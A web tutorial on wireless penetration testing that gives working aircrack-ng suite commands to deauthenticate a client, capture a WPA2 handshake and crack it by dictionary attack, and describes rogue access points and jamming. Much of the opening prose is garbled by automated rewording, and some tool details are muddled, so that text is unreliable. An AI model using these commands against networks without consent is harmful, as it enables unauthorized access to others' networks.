Saturday, May 21, 2022
HomeLinuxHow To Make A Wireless Penetration Test

How To Make A Wireless Penetration Test

- Advertisement -
- Advertisement -

The phrase WiFi refers in order to wireless network technologies that uses radio stations waves to create wireless network cable connections. Due to the particular nature of Wi-fi as well as its methods regarding providing network accessibility, malicious hackers usually opt to penetrate a new company by reducing its WiFi system and corresponding facilities devices. Homes may also be at risk, specifically because of the rise regarding IoT linked gadgets and appliances.

Wi-fi penetration testing is usually composed of six major steps including examen, identifying wireless systems, vulnerability research, fermage, reporting, and remediation. These tests usually are performed mostly in order to maintain secure application code development through its lifecycle. Code mistakes, specific specifications, or not enough information in cyber strike vectors are the primary purpose of executing this kind of penetration analyze.

In this content, we will emphasis our efforts about Wi-Fi penetration tests steps, methods and a lot popular tools employed in the Wi-Fi transmission testing process.

What Is A Wireless Penetration Test?

Wifi penetration testing entails identifying and analyzing the connections among all devices attached with the business’s wi-fi. These devices consist of laptops, tablets, mobile phones, and any some other internet of points (IoT) devices.

Wifi penetration tests are usually typically performed around the client’s site since the pen tester must be in range associated with the wireless transmission to get into it.

What Are The Goals Of A Wireless Pen Test?

Each official penetration analyze should mostly targeted the vulnerabilities many easily exploited.

This particular is frequently referred in order to as choosing the particular “low-hanging fruit” since these determined weaknesses represent the maximum risk and usually are most easily exploitable.

In the situation of wifi systems, these vulnerabilities usually are most often identified in wifi accessibility points.

A purpose for this is usually due to not enough Network Access Settings and due in order to the insufficient MAC PC filtering.

If these types of security controls usually are not used in order to effectively raise the safety of any WiFi system, malicious hackers acquire a considerable edge within the company in addition to can use numerous techniques and Wi-fi hacking tools in order to gain unauthorized accessibility in the system.

Steps To Performing A Wireless Penetration Test

Since previously stated, we are going to concentrate on the technique and steps for testing the Wi-fi network and give types of certain episodes and tools that will accomplish our goal.

Wireless Penetration Steps

Below is a list of steps that can be sorted in 6 different areas of the penetration test.

Step: 1 Wireless Reconnaissance

Ahead of jumping straight in hacking, the initially step in just about every penetration testing method is definitely the information getting phase.

Due to be able to the nature involving Wi-Fi, the facts you gather can be going to appear via War Driving a vehicle. This is a information gathering approach that includes consuming the time to be able to go a principle to sniff out and about Wi-Fi signals.

To do this you will require the following equipment:

  • A car or any other transportation vehicle.
  • A laptop and a Wi-Fi antenna.
  • Wireless network adapter.
  • Packet capture and analysis software.

Most of the information you gather here will be useful but encrypted as most if not all companies use the latest Wi-Fi protocol: WPA2.

This Wi-Fi protocol protects the access point by utilizing encryption and uses EAPOL authentication.

Step 2: Identify Wireless Networks

The next step in Wi-Fi penetration testing is scanning or identifying wireless networks.

Prior to this phase, you must set your wireless card in “monitor” mode in order to enable packet capture and specify your wlan interface.

airmon-ng start wlan0

After your wireless card starts listening to wireless traffic, you can start the scanning process with airodump in order to scan traffic on different channels.

airodump-ng wlan0mon

An important step in decreasing your workload during the scanning process is to force the airodump to capture traffic only on a specific channel.

airodump-ng -c 11 --bssid 00:01:02:03:04:05 -w dump wlan0mon

Step 3: Vulnerability Research

After finding wifi access points through scanning, the next phase of the test will focus on identifying vulnerabilities on that access point. Most common vulnerability is in the 4-way handshake process where an encrypted key is exchanged via between the WiFi access point and the authenticating client.

When a user tries to authenticate to a Wi-Fi access point, a pre-shared key is generated and transmitted.

During the key transmission, a malicious hacker can sniff out the key and brute force it offline to try and extract the password.

In order to clarify this most commonly exploited vulnerability, the next section of the article will focus on the pre-shared key sniffing attack and tools used to successfully accomplish the task.

Step 4: Exploitation

We will use the Airplay NG suite tool to accomplish our exploitation efforts by:

  • De-authenticating a legitimate client.
  • Capturing the initial 4-way handshake when the legitimate client reconnects.
  • Running an offline dictionary attack to crack the captured key.

Since we already started capturing the traffic on a specific channel, we will now proceed with the next step.

De-authenticating A Legitimate Client

aireplay-ng --deauth 5 -a 00:01:02:03:04:05 -c 00:04:05:06:07:08 wlan0mon

By doing this, we are effectively disconnecting the legitimate client from the access point and waiting for our previous Airodump -ng commands that we ran, to sniff out the 4-way handshake once the legitimate client starts reconnecting automatically.

Capturing The Initial Handshake

During the process of capturing traffic after the “de-auth” packets you’ve sent, you will be able to see lots of live information regarding the “de-auth” attack running.

Capturing The Initial Handshake

We can see the channel number, time elapsed, BSSID (MAC address), number of beacons and a lot more information.

The time it takes to successfully perform this depends on the distance between the hacker, the access point and the client we are trying to disconnect.

Once the 4-way handshake has been captured, you can save the capture to a “.cap” file.

By saving all of this captured traffic into a “.cap” file, we can quickly input the file in Wireshark – a popular network protocol analyzer tool to confirm that we have indeed captured all 4 stages of the handshake.

Wireshark network protocol analyzer tool

Since we have now confirmed the 4-way handshake packet capture, we can go ahead and stop the packet capturing by typing the following airodump command: “Airmon-ng stop wlan0mon”.

Dictionary Attack On The Captured Key

Our final step in the exploitation phase is to crack the captured 4-way handshake key and extract the password. To do this, we do not even have to use additional password cracking tools such as JohntheRipper or Hydra. We can simply use the Aircrack-ng module of the aireplay-ng suite.

aircrack-ng -b 00:01:02:03:04:05 dump-01.cap

Additionally, you must identify the dictionary you want to use for cracking the key by specifying the file path after the “dump-01.cap” part of the above command.

This command will run the cracking process on target MAC address of the access point utilizing the captured traffic in the .cap file and a specified dictionary.

Dictionary Attack on the Captured Key

As the end result, we successfully found the password phrase “community.

Other Wireless Attacks

Since capturing keys from the 4-way handshake and brute forcing it offline is one of the most effective ways to gain unauthorized access, we placed the emphasis on this one practical attack.

Other practical attacks on wireless networks include the deployment of a rogue access point within the company.

This attack leverages the use of an unauthorized Wi-Fi access point deployed inside the company buildings.

The main idea is to overpower the signals of a legitimate access point in the company’s network (or use Wi-Fi signal jammers to render the authorized access point inaccessible) and force the employees to connect to the unauthorized access point.

If this runs successfully, an attacker will have control over all the traffic that is passing through that access point.

Step 5: Reporting

Structuring all of your steps, methods and findings into a comprehensive document is the most important step in the work of a penetration tester.

It is highly suggested to document every step of your work, including every detailed finding, so you can have all the necessary details to make your report complete.

Make sure to include an executive summary, detailed technical risks, vulnerabilities you found along with the complete process of how you found them, exploits that were successful and recommendations for mitigation.

Step 6: Remediation And Security Controls

We’ve demonstrated one practical exploit regarding Wireless networks that involves capturing Wi-Fi traffic and the pre-shared key. The attack was successful for many reasons including the lack of MAC filtering controls.

With this control turned on, the malicious hacker wouldn’t have been able to authenticate himself with the same password the legitimate user did.

Since anything can be hacked, the attacker would have to spoof his MAC address that is on the MAC list of approved addresses in order to successfully break in the wireless network.

Having Network Access Control (NAC) solutions in place will mitigate the possibility of having rouge access points in your network.

Additionally, company may consider deploying wireless honeypots – simulated wireless networks that are used for detecting intrusions and analyzing the behavior of malicious hackers.


Wifi networks need as much security consideration when being deployed and configured in order to keep them secure. Wireless transmission testing is therefore a popular way to look for the realistic security posture of your wireless networks.

Actually though it requires a little more hardware equipment than your usual penetration test, wireless penetration screening Is still carried out with software tools often contained in the Kali Linux OPERATING SYSTEM with the industry’s most infamous tool for it being Airplay -NG.

All of us demonstrated a useful way of utilizing Airplay -NG and the outcomes it can give using its powerful set of sub-tools. All that is left that you should do now is try it out by yourself (make sure you have consent for whatever and however small of a test you intend to do) and reduce those vulnerabilities!

- Advertisement -


Please enter your comment!
Please enter your name here

- Advertisment -

Most Popular

Recent Comments